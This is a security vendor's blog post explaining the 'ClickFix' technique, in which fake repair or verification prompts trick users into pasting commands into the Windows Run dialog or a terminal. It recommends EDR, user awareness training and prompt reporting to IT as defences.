Cybersecurity 101: A Whole New World of Malware Delivery (Clickfix)

Many customers have asked us here at Pondurance what "ClickFix" is, and how they can protect their organizations against it.  This relatively new form of a known technique for malware delivery is becoming extremely popular, so let's dig into it and see what you can do.

What is ClickFix?

Clickfix is a form of threat activity that attempts to trick a user into running commands on their own devices which give a threat actor access to the system, credential information, or other sensitive stuff. Unlike more traditional phishing or malware that try to get the user to log into a site or run an application, Clickfix instead tries to get the victim to execute commands or scripts directly by pretending that they must perform an action for some reason that does not involve opening a file or running an application.

Most commonly, the user will go to a website which has been compromised by a threat actor, the user accidentally mis-types the URL of the site and a threat actor has set up a fake site at the misspelled domain, or a phishing email is delivered to their mailbox. In all three cases, once the user loads the web page, or opens the email a pop-up message (within the browser) tells the user that there is a problem with their machine, with their access to the site, or some other issue that they must fix (hence the "fix" part of the name).  In some cases, the message is displayed directly on the web-page or in the email text and the attack doesn't use a pop-up message. Common attack messages are that the user's internet connection is malfunctioning, that their computer has had a virus detected on it, or that the owner of the website requires additional verification before they are permitted to view it.  The last format has become extremely popular on compromised and/or fake adult content websites since several countries either have implemented, or are about to implement, age verification before a visitor can view the website itself.  Messages indicating "machine verification" or other such ruses are also common across a wide variety of types of websites and services. 

Instead of instructing a user to download a file (or attempt to automatically start the download of a file), Clickfix attacks instead tell the user that they must perform a "Repair" or "Review" process in order to gain access to the site. Lots of other words are used, but most begin with an "R" in order to make the next step sound legitimate  To perform the repair/review/etc., the user is instructed to copy a string of text from a special "verification" or "diagnostic" message (and in some cases copies the text to the clipboard automatically), then press WindowsKey+R on Windows, and paste the text into the system popup that this brings up, then hit Enter.  What this is doing is bringing up the Windows "Run Command" prompt (WIN+R), and the string of text is actually a set of commands/scripts that will then run on the user's machine once they press Enter.  For most users, if they're told they need to repair or review something with WIN+R, that would seem to make sense. 

The commands vary depending on the attack:

•  Some will force the system to download and run malware from an online location without using a browser.

• Others attempt to run commands directly on the machine which steal information like login info and other sensitive data.

• Newer variants attempt to leverage built-in encoding systems in most Operating Systems (OS) to make it look like the commands are a random string of garbage - but when sent through the Run Command, the string is decoded into the attack commands/scripts and run.

For example, the string "dGhpcyBzdHJpbiBvZiB0ZXh0IGNvdWxkIGJlIG1hbGljaW91cw==" in Base64 decodes to "this string of text could be malicious" but the user would only see the garbled text, not the actual message/commands. Once tools in the OS decode the message, it turns back into its original form, and can be executed as a command or script.

Is it Only Windows? 

While Windows has seen the most use of ClickFix in recent times, MacOS and Linux are not immune. In the case of those two OS's, the victim is shown a message saying they must open the Terminal application (which is part of the OS itself) and paste the string of text into that app.  On MacOS we've also seen attacks trying to trick a user into dragging and dropping a file of scripts directly onto the Terminal application - usually in the guise of having them install an application that they thought was legitimate, but is in fact malware.  Since it is not unusual for legitimate applications to instruct the user to download a file onto the icon for the Applications folder, the social engineering trick of just switching what they drop the file onto works unfortunately well. 

The end result is the same: Malicious commands/scripts are run on the victim's machine, and the threat actor gains valuable information, installs other malware, gains access to the machine, or all three.  So regardless of what OS's you use in your organization, this is a threat you need to be aware of. 

Haven't I Seen This Before?

ClickFix isn't brand new, in fact the attack was first spotted and named in early 2024.  Back then, threat actors were attempting to trick a user into opening a specially-crafted Office document (Word, Excel, etc.) which contained the malicious commands and scripting.  The "bait" was the same - the user needed to review the instructions in the document in order to perform some necessary action - and the outcome was the same as well.  Using documents to launch the attack became harder and harder as Endpoint Detection and Response (EDR) platforms, Operating Systems, other cybersecurity tools, and Office itself became better at recognizing the attack and blocking it.  As with most malware threat actors, they adapted and found new ways to get their jobs done, leading to the current generation of ClickFix that doesn't require the use of documents - especially on Windows. 

How Can ClickFix Be Stopped?

In the case of ClickFix, there are a few things that can be done to stop an attacker from successfully using the technique.  Security tools like EDR/anti-malware are getting better at detecting ClickFix - but anti-virus (which only looks at the content of a file downloaded to disk) won't catch it.  So upgrading to an EDR is a good idea, especially because that brings with it a significant number of other security benefits.  EDR's can't stop all types of ClickFix attack, however - so EDR alone is not enough. 

The most powerful tool at our disposal is user awareness training. Users do not have to become cybersecurity experts to defend the organization from ClickFix, as spotting it is easy enough for even non-technical folks to do successfully.

First, no user should be using the Run Command system in Windows (WIN+R) unless the organization's IT staff is specifically telling them to do so., and not via email - the IT staff should be personally telling them to do it via phone.  They should never use it when prompted by a website or email message under any circumstances.  While it is possible to disable Win+R completely, it does require the use of Group Policy Objects in either Active Directory or EntraID and also requires that all devices are being managed by AD or Entra - so that might not be an option for every organization. Making users aware that Win+R is not a repair tool and shouldn't be used unless they're in active contact with IT is a good safeguard.

 Next, regardless of what OS the user has on their device, they should never drag and drop a file onto a Command Window (cmd.exe), PowerShell window, or the Terminal app (macOS and Linux).  While these tools exist for valid reasons, they are not something users will have to work with on a regular basis unless they are IT, cybersecurity, or developer staffers. As with WIN+R, any user asked to do this type of operation should only do so when in direct communication (by phone) with IT staff. 

 Finally, if any website, email, or anything else tells a user to try to do either of those things, they should close their browser and immediately contact the IT or Cybersecurity team of the organization.  Refusing to follow the ClickFix instructions will prevent them from actually compromising their devices, but it is vital that the technology staff know it happened and follow up to be sure nothing went wrong. 

That last one can be embarrassing for some users, as they may have encountered the ClickFix message while surfing websites that are against company policy (adult content, gambling, etc.); but it is vital that they report it anyway.  Make it well known and understood that no one will get fired over reporting a ClickFix website unless the company finds out they went to that site and didn't report it to IT.   This has a double-benefit: it lets the IT team keep the organization safe, and it drastically cuts down on users going to inappropriate sites on company devices - since they'll think twice before taking the chance they see ClickFix and have to admit what site they went to. 

In summary, security controls can stem the tide of ClickFix attacks to no small degree, but not eliminate them entirely. User awareness is key, and will be equally effective in stopping ClickFix from working due to disabling a key component required for the attack to work: the human factor.

About the Author:

Michael DeNapoli is a seasoned Senior Solutions Architect with more than 25 years of experience in cybersecurity, solution architecture, and enterprise systems design. Throughout his career, he has led technical strategy, security architecture, and advanced solution development for organizations ranging from emerging security vendors to global enterprises. Michael’s expertise spans cybersecurity operations, cloud architecture, technical sales leadership, security posture management, and identity protection, with a proven track record of guiding clients through complex technology challenges. Today, he brings his deep industry knowledge to Pondurance as a Senior Solutions Architect, helping organizations strengthen their security foundations with clarity and confidence.